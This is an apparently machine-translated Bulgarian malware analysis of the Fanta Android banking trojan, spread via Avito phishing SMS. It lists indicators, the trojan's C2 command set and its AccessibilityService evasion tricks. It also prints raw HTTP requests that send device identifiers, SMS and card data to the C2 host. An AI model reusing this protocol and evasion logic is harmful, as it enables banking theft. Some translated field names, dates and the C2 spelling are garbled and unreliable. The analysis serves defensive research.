Един ден искате да продадете нещо на Avito и след като публикувате подробно описание на вашия продукт (например RAM модул), ще получите това съобщение:
След като отворите връзката, ще видите на пръв поглед безобидна страница, която ви уведомява, щастливия и успешен продавач, че е направена покупка:
След като щракнете върху бутона „Продължи“, APK файл с икона и вдъхващо доверие име ще бъде изтеглен на вашето устройство с Android. Инсталирахте приложение, което по някаква причина поиска права за AccessibilityService, след което се появиха няколко прозореца и бързо изчезнаха и... Това е всичко.
Отивате да проверите баланса си, но по някаква причина приложението ви за банкиране иска отново данните за вашата карта. След като въведете данните, се случва нещо ужасно: по някаква все още неясна за вас причина парите започват да изчезват от сметката ви. Опитвате се да разрешите проблема, но телефонът ви се съпротивлява: натиска клавишите „Назад“ и „Начало“, не се изключва и не ви позволява да активирате никакви мерки за сигурност. В резултат оставате без пари, стоките ви не са закупени, объркани сте и се чудите: какво се е случило?
Отговорът е прост: станали сте жертва на Android Trojan Fanta, член на семейството Flexnet. Как се случи това? Нека сега да обясним.
Автори: Андрей Половинкин, младши специалист по анализ на зловреден софтуер, Иван Писарев, специалист по анализ на зловреден софтуер.
Някои статистики
Фамилията Flexnet от троянски коне за Android стана известна за първи път през 2015 г. За доста дълъг период на дейност семейството се разшири до няколко подвида: Fanta, Limebot, Lipton и др. Троянският кон, както и инфраструктурата, свързана с него, не стоят неподвижни: разработват се нови ефективни схеми за разпространение - в нашия случай висококачествени фишинг страници, насочени към конкретен потребител-продавач, а разработчиците на троянски кон следват модните тенденции в писане на вируси - добавяне на нова функционалност, която прави възможно по-ефективното кражба на пари от заразени устройства и заобикаляне на защитните механизми.
Кампанията, описана в тази статия, е насочена към потребители от Русия; малък брой заразени устройства са регистрирани в Украйна и още по-малко в Казахстан и Беларус.
Въпреки че Flexnet е на сцената на Android Trojan вече повече от 4 години и е проучен подробно от много изследователи, той все още е в добра форма. От януари 2019 г. потенциалният размер на щетите е повече от 35 милиона рубли - и това е само за кампании в Русия. През 2015 г. различни версии на този Android троянски кон бяха продадени в подземни форуми, където можеше да бъде намерен и изходният код на троянския кон с подробно описание. Това означава, че статистиката на щетите в света е още по-впечатляваща. Не е лош показател за толкова възрастен човек, нали?
От продажба до измама
Както се вижда от представената по-рано екранна снимка на фишинг страница за интернет услугата за публикуване на реклами Avito, тя е била подготвена за конкретна жертва. Очевидно нападателите използват един от парсерите на Avito, който извлича телефонния номер и името на продавача, както и описанието на продукта. След разширяване на страницата и подготовка на APK файла, на жертвата се изпраща SMS с неговото име и връзка към фишинг страница, съдържаща описание на неговия продукт и сумата, получена от „продажбата“ на продукта. Щраквайки върху бутона, потребителят получава злонамерен APK файл - Fanta.
Проучване на домейна shcet491[.]ru показа, че той е делегиран на DNS сървърите на Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Файлът на зоната на домейна съдържа записи, сочещи към IP адресите 31.220.23[.]236, 31.220.23[.]243 и 31.220.23[.]235. Въпреки това записът на основния ресурс на домейна (запис A) сочи към сървър с IP адрес 178.132.1[.]240.
IP адрес 178.132.1[.]240 се намира в Холандия и принадлежи на хостера Световен поток. IP адреси 31.220.23[.]235, 31.220.23[.]236 и 31.220.23[.]243 се намират в Обединеното кралство и принадлежат на споделения хостинг сървър HOSTINGER. Използва се като рекордер openprov-ru. Следните домейни също разрешиха IP адрес 178.132.1[.]240:
- sdelka-ru[.]ru
- товар-ав[.]ру
- ав-товар[.]ру
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Трябва да се отбележи, че връзките в следния формат бяха налични от почти всички домейни:
http://(www.){0,1}<%domain%>/[0-9]{7}
Този шаблон включва и връзка от SMS съобщение. Въз основа на исторически данни беше установено, че един домейн съответства на няколко връзки в описания по-горе модел, което показва, че един домейн е бил използван за разпространение на троянския кон до няколко жертви.
Да прескочим малко напред: троянският кон, изтеглен чрез връзка от SMS, използва адреса като контролен сървър onusedseddohap[.]клуб. Този домейн е регистриран на 2019 март 03 г. и от 12 април 2019 г. APK приложенията взаимодействат с този домейн. Въз основа на данните, получени от VirusTotal, общо 04 приложения са взаимодействали с този сървър. Самият домейн се разреши на IP адреса 217.23.14[.]27, разположен в Холандия и собственост на хостера Световен поток. Използван като рекордер евтино име. Домейните също са разрешени към този IP адрес bad-racoon[.]клуб (от 2018-09-25) и bad-racoon[.]на живо (от 2018-10-25). С домейн bad-racoon[.]клуб повече от 80 APK файла, с които сте взаимодействали bad-racoon[.]на живо - повече от 100.
Като цяло атаката протича по следния начин:
Какво има под капака на Fanta?
Подобно на много други троянски коне за Android, Fanta може да чете и изпраща SMS съобщения, да прави USSD заявки и да показва свои собствени прозорци върху приложения (включително банкови). Въпреки това, арсеналът от функционалност на това семейство е пристигнал: Fanta започна да използва AccessibilityService за различни цели: четене на съдържанието на известия от други приложения, предотвратяване на откриване и спиране на изпълнението на троянски кон на заразено устройство и др. Fanta работи на всички версии на Android не по-млади от 4.4. В тази статия ще разгледаме по-отблизо следната проба на Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Веднага след изстрелването
Веднага след стартирането троянският кон скрива своята икона. Приложението може да работи само ако името на заразеното устройство не е в списъка:
- android_x86
- VirtualBox
- Nexus 5X (булхед)
- Nexus 5 (бръсначка)
Тази проверка се извършва в основната услуга на троянския кон - MainService. Когато се стартира за първи път, конфигурационните параметри на приложението се инициализират до стойности по подразбиране (форматът за съхраняване на конфигурационните данни и тяхното значение ще бъдат обсъдени по-късно) и ново заразено устройство се регистрира на контролния сървър. HTTP POST заявка с типа съобщение ще бъде изпратена до сървъра register_bot и информация за заразеното устройство (версия на Android, IMEI, телефонен номер, име на оператор и код на държавата, в която е регистриран операторът). Адресът служи като контролен сървър hXXp://onuseseddohap[.]club/controller.php. В отговор сървърът изпраща съобщение, съдържащо полетата bot_id, bot_pwd, сървър — приложението запазва тези стойности като параметри на CnC сървъра. Параметър сървър незадължително, ако полето не е получено: Fanta използва адреса за регистрация - hXXp://onuseseddohap[.]club/controller.php. Функцията за промяна на CnC адреса може да се използва за решаване на два проблема: за равномерно разпределяне на натоварването между няколко сървъра (ако има голям брой заразени устройства, натоварването на неоптимизиран уеб сървър може да бъде високо), а също и за използване алтернативен сървър в случай на повреда на някой от CnC сървърите.
Ако възникне грешка при изпращане на заявката, троянският кон ще повтори процеса на регистрация след 20 секунди.
След като устройството бъде успешно регистрирано, Fanta ще покаже следното съобщение на потребителя:
Важна забележка: сервизът се обади Системна сигурност — името на троянската услуга и след натискане на бутона ОК Ще се отвори прозорец с настройките за достъпност на заразеното устройство, където потребителят трябва да предостави права за достъпност на злонамерената услуга:
Веднага щом потребителят се включи AccessibilityService, Fanta получава достъп до съдържанието на прозорците на приложението и действията, извършвани в тях:
Веднага след получаване на права за достъпност, троянският кон изисква администраторски права и права за четене на известия:
Използвайки AccessibilityService, приложението симулира натискане на клавиши, като по този начин си дава всички необходими права.
Fanta създава множество копия на база данни (които ще бъдат описани по-късно), необходими за съхраняване на конфигурационни данни, както и информация, събрана в процеса за заразеното устройство. За да изпрати събраната информация, троянският кон създава повтаряща се задача, предназначена да изтегли полета от базата данни и да получи команда от контролния сървър. Интервалът за достъп до CnC се задава в зависимост от версията на Android: в случай на 5.1 интервалът ще бъде 10 секунди, в противен случай 60 секунди.
За да получи командата, Фанта прави заявка GetTask към сървъра за управление. В отговор CnC може да изпрати една от следните команди:
| Отбор | описание |
|---|---|
| 0 | Изпратете SMS съобщение |
| 1 | Направете телефонно обаждане или USSD команда |
| 2 | Актуализира параметър интервал |
| 3 | Актуализира параметър откъсване |
| 6 | Актуализира параметър smsManager |
| 9 | Започнете да събирате SMS съобщения |
| 11 | Нулирайте телефона си до фабричните настройки |
| 12 | Активиране/деактивиране на регистриране на създаването на диалогов прозорец |
Fanta също събира известия от 70 банкови приложения, системи за бързи плащания и електронни портфейли и ги съхранява в база данни.
Съхраняване на конфигурационни параметри
За да съхранява конфигурационни параметри, Fanta използва стандартен подход за платформата Android - Предпочитания-файлове. Настройките ще бъдат записани във файл с име настройки. Описание на запаметените параметри е в таблицата по-долу.
| име | Стойност по подразбиране | Възможни стойности | описание |
|---|---|---|---|
| id | 0 | цяло число | ID на бот |
| сървър | hXXp://onuseseddohap[.]клуб/ | URL | Контролен адрес на сървъра |
| хората с увреждания | - | Низ | Парола на сървъра |
| интервал | 20 | цяло число | Времеви интервал. Показва за колко време трябва да бъдат отложени следните задачи:
|
| откъсване | all | всички/телНомер | Ако полето е равно на низа all или телНомер, тогава полученото SMS съобщение ще бъде прихванато от приложението и няма да се покаже на потребителя |
| smsManager | 0 | 0/1 | Активирайте/деактивирайте приложението като SMS получател по подразбиране |
| readDialog | фалшив | Вярно невярно | Активиране/деактивиране на регистрирането на събития Събитие за достъпност |
Fanta също използва файла smsManager:
| име | Стойност по подразбиране | Възможни стойности | описание |
|---|---|---|---|
| pckg | - | Низ | Име на използвания мениджър на SMS съобщения |
Взаимодействие с бази данни
По време на работата си троянският кон използва две бази данни. Име на базата данни a използва се за съхраняване на различна информация, събрана от телефона. Втората база данни е наименувана fanta.db и се използва за запазване на настройките, отговорни за създаването на фишинг прозорци, предназначени да събират информация за банкови карти.
Троянският кон използва база данни а за съхраняване на събраната информация и регистриране на вашите действия. Данните се съхраняват в таблица трупи. За да създадете таблица, използвайте следната SQL заявка:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Базата данни съдържа следната информация:
1. Регистриране на стартирането на заразеното устройство със съобщение Телефонът се включи!
2. Известия от приложения. Съобщението се генерира по следния шаблон:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Данни за банкови карти от фишинг формуляри, създадени от троянския кон. Параметър VIEW_NAME може да бъде едно от следните:
- AliExpress
- Avito
- Google Пускайте
- Разни <%App Name%>
Съобщението се регистрира във формат:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Входящи/изходящи SMS съобщения във формат:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Информация за пакета, който създава диалоговия прозорец във формат:
(<%Package name%>)<%Package information%>
Примерна таблица трупи:
Една от функционалностите на Fanta е събирането на информация за банкови карти. Събирането на данни става чрез създаване на фишинг прозорци при отваряне на банкови приложения. Троянският кон създава прозореца за фишинг само веднъж. Информацията, че прозорецът е бил показан на потребителя, се съхранява в таблица настройки в базата данни fanta.db. За да създадете база данни, използвайте следната SQL заявка:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Всички полета на таблицата настройки по подразбиране се инициализира на 1 (създаване на прозорец за фишинг). След като потребителят въведе своите данни, стойността ще бъде зададена на 0. Пример за полета на таблица настройки:
- can_login — полето отговаря за показване на формата при отваряне на банково приложение
- първа_банка - не се използва
- can_avito — полето отговаря за показването на формуляра при отваряне на приложението Avito
- can_ali — полето отговаря за показването на формуляра при отваряне на приложението Aliexpress
- може_друго — полето е отговорно за показване на формуляра при отваряне на всяко приложение от списъка: Yula, Pandao, Drom Auto, Wallet. Карти за отстъпки и бонуси, Aviasales, Booking, Trivago
- can_card — полето отговаря за показването на формата при отваряне Google Пускайте
Взаимодействие със сървъра за управление
Мрежовото взаимодействие със сървъра за управление се осъществява чрез HTTP протокола. За да работи с мрежата, Fanta използва популярната библиотека Retrofit. Заявките се изпращат до: hXXp://onuseseddohap[.]club/controller.php. Адресът на сървъра може да бъде променен при регистрация на сървъра. Бисквитките могат да бъдат изпратени в отговор от сървъра. Fanta прави следните заявки към сървъра:
- Регистрацията на бота на контролния сървър се извършва веднъж, при първото стартиране. Следните данни за заразеното устройство се изпращат на сървъра:
· Дребни Сладки и Бисквити — бисквитки, получени от сървъра (стойността по подразбиране е празен низ)
· вид — низова константа register_bot
· префикс — целочислена константа 2
· версия_sdk — се формира по следния образец: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI на заразеното устройство
· държава — код на държавата, в която е регистриран операторът, във формат ISO
· брой - телефонен номер
· оператор — име на оператораПример за заявка, изпратена до сървъра:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>В отговор на заявката сървърът трябва да върне JSON обект, съдържащ следните параметри:
· bot_id — ID на заразеното устройство. Ако bot_id е равно на 0, Fanta ще изпълни отново заявката.
bot_pwd — парола за сървъра.
сървър — адрес на контролния сървър. Незадължителен параметър. Ако параметърът не е зададен, ще се използва адресът, записан в приложението.Примерен JSON обект:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Искане за получаване на команда от сървъра. Следните данни се изпращат на сървъра:
· Дребни Сладки и Бисквити — бисквитки, получени от сървъра
· предложение — идентификатор на заразеното устройство, получен при изпращане на заявката register_bot
· хората с увреждания — парола за сървъра
· divice_admin — полето определя дали са получени администраторски права. Ако са получени администраторски права, полето е равно на 1в противен случай 0
· Достъпност — Работно състояние на услугата за достъпност. Ако услугата е стартирана, стойността е 1в противен случай 0
· SMSManager — показва дали троянският кон е активиран като приложение по подразбиране за получаване на SMS
· екран — показва в какво състояние е екранът. Стойността ще бъде зададена 1, ако екранът е включен, в противен случай 0;Пример за заявка, изпратена до сървъра:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>В зависимост от командата сървърът може да върне JSON обект с различни параметри:
· Отбор Изпратете SMS съобщение: Параметрите съдържат телефонния номер, текста на SMS съобщението и ID на съобщението, което се изпраща. Идентификаторът се използва при изпращане на съобщение до сървъра с тип setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Отбор Направете телефонно обаждане или USSD команда: Телефонният номер или команда идват в тялото на отговора.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Отбор Промяна на параметъра на интервала.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Отбор Промяна на параметъра за прихващане.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Отбор Променете полето SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Отбор Събирайте SMS съобщения от заразено устройство.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Отбор Нулирайте телефона си до фабричните настройки:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Отбор Променете параметъра ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Изпращане на съобщение с тип setSmsStatus. Тази заявка се прави след изпълнение на командата Изпратете SMS съобщение. Заявката изглежда така:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Качване на съдържанието на базата данни. На заявка се предава един ред. Следните данни се изпращат на сървъра:
· Дребни Сладки и Бисквити — бисквитки, получени от сървъра
· вид — низова константа setSaveInboxSms
· предложение — идентификатор на заразеното устройство, получен при изпращане на заявката register_bot
· текст — текст в текущия запис на база данни (поле d от масата трупи в базата данни а)
· брой — име на текущия запис в базата данни (поле p от масата трупи в базата данни а)
· sms_mode — цяло число (поле m от масата трупи в базата данни а)Заявката изглежда така:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Ако бъде изпратен успешно до сървъра, редът ще бъде изтрит от таблицата. Пример за JSON обект, върнат от сървъра:
{ "response":[], "status":"ok" }
Взаимодействие с AccessibilityService
AccessibilityService е внедрена, за да направи устройствата с Android по-лесни за използване от хора с увреждания. В повечето случаи е необходимо физическо взаимодействие за взаимодействие с приложение. AccessibilityService ви позволява да ги правите програмно. Fanta използва услугата, за да създава фалшиви прозорци в банкови приложения и да не позволява на потребителите да отварят системни настройки и някои приложения.
Използвайки функционалността на AccessibilityService, троянският кон следи промените в елементите на екрана на заразеното устройство. Както беше описано по-горе, настройките на Fanta съдържат параметър, отговорен за операциите за регистриране с диалогови прозорци - readDialog. Ако този параметър е зададен, информацията за името и описанието на пакета, който е задействал събитието, ще бъде добавена към базата данни. Троянският кон извършва следните действия, когато се задействат събития:
- Симулира натискане на клавишите за връщане и начало в следните случаи:
· ако потребителят иска да рестартира устройството си
· ако потребителят иска да изтрие приложението Avito или да промени правата за достъп
· ако на страницата се споменава приложението „Avito“.
· при отваряне на приложението Google Play Protect
· при отваряне на страници с настройки на AccessibilityService
· когато се появи диалоговият прозорец за защита на системата
· при отваряне на страницата с настройките „Изчертаване върху друго приложение“.
· при отваряне на страницата „Приложения“, „Възстановяване и нулиране“, „Нулиране на данни“, „Нулиране на настройки“, „Панел за разработчици“, „Специални. възможности”, „Специални възможности”, „Специални права”
· ако събитието е генерирано от определени приложения.Списък с приложения
- андроид
- Master Lite
- Clean магистър
- Clean Master за процесор x86
- Meizu Управление на разрешения за приложения
- Защита на MIUI
- Clean Master - Antivirus & Cache и Garbage Cleaner
- Родителски контрол и GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Почистване на вируси, антивирус, средство за почистване (MAX Security)
- Mobile AntiVirus Security PRO
- Avast Antivirus & безплатна защита 2019
- Мобилна сигурност MegaFon
- AVG защита за Xperia
- Мобилна сигурност
- Malwarebytes Antivirus & Protection
- Антивирусна програма за android 2019
- Security Master - Антивирус, VPN, AppLock, Booster
- Антивирусна програма AVG за таблет Huawei System Manager
- Достъпност на Samsung
- Samsung Smart Manager
- Учител по сигурност
- Ускорител на скоростта
- Д -р Уеб
- Пространство за сигурност на Dr.Web
- Мобилен контролен център Dr.Web
- Dr.Web Security Space Life
- Мобилен контролен център Dr.Web
- Антивирусна и мобилна сигурност
- Kaspersky Internet Security: Антивирусна защита и защита
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - защита и управление
- AVG Antivirus free 2019 – Защита за Android
- Android Antivirus
- Norton Mobile Security и Antivirus
- Антивирусна програма, защитна стена, VPN, мобилна сигурност
- Мобилна сигурност: антивирусна, VPN, защита от кражба
- Антивирус за Android
- Ако се иска разрешение при изпращане на SMS съобщение до кратък номер, Fanta симулира щракване върху квадратчето за отметка Запомнете избора и бутона да изпрати.
- Когато се опитате да отнемете администраторски права от троянския кон, той заключва екрана на телефона.
- Предотвратява добавянето на нови администратори.
- Ако антивирусното приложение dr.web засече заплаха, Fanta имитира натискане на бутона игнорирайте.
- Троянският кон симулира натискане на бутона за връщане и начало, ако събитието е генерирано от приложението Грижа за устройството на Samsung.
- Fanta създава фишинг прозорци с формуляри за въвеждане на информация за банкови карти, ако е стартирано приложение от списък с около 30 различни интернет услуги. Сред тях: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto и др.
Формуляри за фишинг
Fanta анализира кои приложения работят на заразеното устройство. Ако е отворено интересно приложение, троянският кон показва прозорец за фишинг върху всички останали, който представлява форма за въвеждане на информация за банкова карта. Потребителят трябва да въведе следните данни:
- Номер на карта
- Дата на изтичане на картата
- CVV
- Име на картодържател (не за всички банки)
В зависимост от работещото приложение ще се покажат различни прозорци за фишинг. По-долу са дадени примери за някои от тях:
AliExpress:
Авито:
За някои други приложения, напр. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Как беше наистина
За щастие, човекът, получил описания в началото на статията SMS, се оказа специалист по киберсигурност. Следователно истинската, нережисьорска версия се различава от разказаната по-рано: човек получава интересен SMS, след което го предава на екипа на Group-IB Threat Hunting Intelligence. Резултатът от атаката е тази статия. Щастлив край, нали? Не всички истории обаче завършват толкова успешно и за да не изглежда вашата режисьорска версия със загуба на пари, в повечето случаи е достатъчно да се придържате към следните отдавна описани правила:
- не инсталирайте приложения за мобилно устройство с Android OS от източници, различни от Google Play
- Когато инсталирате приложение, обърнете специално внимание на правата, изисквани от приложението
- обърнете внимание на разширенията на изтеглените файлове
- инсталирайте редовно актуализации на Android OS
- не посещавайте подозрителни ресурси и не изтегляйте файлове от там
- Не кликвайте върху връзките, получени в SMS съобщения.
Източник: www.habr.com